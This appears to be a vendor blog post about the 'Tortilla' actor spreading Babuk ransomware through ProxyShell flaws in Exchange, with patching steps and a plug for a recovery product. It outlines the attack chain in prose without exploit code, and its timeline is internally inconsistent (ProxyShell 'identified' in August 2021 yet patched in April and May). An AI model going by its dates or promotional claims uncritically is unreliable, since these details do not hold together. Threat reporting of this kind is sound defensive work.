Summary: A new threat actor identified as 'Tortilla' is targeting Microsoft Exchange Servers with known ProxyShell (authentication bypass) vulnerabilities to spread and infect the servers with Babuk ransomware. The threat actor has been targeting organizations based in the U.S., Germany, Brazil, Thailand, and the U.K. In this blog, we've discussed the Babuk ransomware in detail and mentioned the steps to protect your vulnerable Exchange Server from such malicious attacks.
Contents
Tortilla, a new threat actor, is targeting organizations with unpatched Exchange Servers vulnerable to ProxyShell attacks. The threat actor is using the China Chopper Web Shell to spread the Babuk ransomware and demanding $10,000 ransom in XMR (Monero) cryptocurrency to decrypt the data encrypted by the ransomware.
Tortilla?s ransom note:
Source: Cisco
What is Babuk Ransomware?
Babuk ransomware is a new ransomware discovered in early 2021 after it impacted at least 5 major organizations, including Washington D.C. Police Department. One of them even paid $85,000 ransom to the threat actors in order to get their data back.
It was only after the source code of the first Babuk ransomware and builder was leaked on hacking forums that new threat actors and groups, such as Tortilla, began utilizing the ransomware to modify and launch their attacks.
Babuk is one of the most infamous ransomware that encrypts the targeted Exchange Server, interrupts backups, and deletes VSS copies (Volume Shadow Copies), leaving no option for recovery.
Although the threat actors behind the Babuk ransomware are targeting Exchange servers across the globe, most of its victims are from the United States. Some attacks are also noticed in Germany, Brazil, Thailand, and the United Kingdom. Furthermore, the attacks are predicted to increase as attackers are constantly scanning for vulnerable Exchange Servers using the auto-discover URL.
How is Tortilla Attacking Vulnerable Exchange Servers with Babuk Ransomware?
ProxyShell is a set of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) identified by Microsoft in August 2021. When chained together, these vulnerabilities allow an attacker to bypass authentication, run malicious scripts, install web shells, backdoors, and perform unauthorized remote code execution on the targeted Exchange Server.
Although Microsoft released updates back in April 2021 and May 2021 to patch ProxyShell vulnerabilities, several organizations are still unpatched and vulnerable to ProxyShell attacks.
The threat actor starts the attack by exploiting the ProxyShell vulnerabilities to access the targeted Exchange Server. Once inside, the attacker drops DLL or .NET executable files on the compromised Exchange Server. Next, the Exchange Internet Information Services or IIS worker process w3wp.exe that handles the web requests sent to the IIS web server. The IIS process executes the malicious payload to execute another evasive PowerShell command, which bypasses the endpoint protection and invokes a web request to download the payload loader called ‘tortilla.exe.’
This loader connects to the Pastebin.pl site to download a payload, loaded into the memory, and injected into the .NET framework process. This eventually starts to encrypt the server data and mounted drives with Babuk ransomware.
Although Czech cybersecurity firm Avast earlier released a decryptor for Babuk ransomware, it doesn’t work for this Babuk ransomware variant.
The decryptor can decrypt files or data encrypted using the .babuk, .babyk, or .doydo extensions or whose keys were leaked with the Babuk ransomware source code.
How to Protect your Organization from Babuk Ransomware?
According to a report by Shodan, a search engine that allows users to search different types of Internet-connected servers, more than 25000 Exchange Servers are still unpatched and vulnerable to ProxyShell attacks as of November 9, 2021.
To protect your organization from Babuk ransomware, update the Exchange Server. There is no other way around.
It is highly suggested that you identify the vulnerabilities on your Exchange Server and patch them using latest Microsoft Cumulative Updates or Security Updates released for supported Exchange Server versions.
You can follow the steps discussed below to identify the vulnerabilities and patch them to safeguard your organization against ProxyShell attacks.
- Download the Exchange Server Health Checker Script or HealthChecker.ps1. The script supports Exchange Server 2013, 2016, and 2019.
- Open PowerShell and navigate to the folder where HealthChecker.ps1 script is located.
- Then run the following command to execute the script:
.\HealthChecker.ps1 -BuildHtmlServersReport
- You may also run the script for a specific server by using -Server parameter.
.\HealthChecker.ps1 -Server Exch01 -BuildHtmlServersReport
If the output displays an error or the script does not run, execute the following command in EMS and run the HealthChecker.ps1 script.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
This will generate an HTML file. Open this HTML file in any web browser to check the server’s health status, vulnerabilities, and issues.
Then fix the issues and patch the vulnerabilities by downloading and installing the updates released by Microsoft.
Refer to Exchange Deployment Assistant to learn steps to update and patch your Exchange Server with the latest CUs and protect against malicious attacks.
Final Thoughts
The Tortilla threat actor is exploiting ProxyShell vulnerabilities that were patched back in May 2021 by Microsoft. However, there are several thousand organizations that are still not patched and vulnerable to ProxyShell attacks. If your organization is one of those, installing the latest Exchange Server Cumulative and Security Updates is the best defense.
But if you are the unfortunate one whose server is already compromised or crashed after the malicious attack, build a new server and use the backup to restore mailboxes on the new server. You can also use Exchange recovery software, such as Stellar Repair for Exchange, if backups aren’t available, obsolete, or do not work. The software can help you quickly recover mailboxes from the compromised Exchange Server database and restore them to a new Exchange Server or Office 365 tenant in a few clicks.
Never use the compromised server even if it is fixed or working. You can use the EOMT tool by Microsoft to detect if your server is compromised.
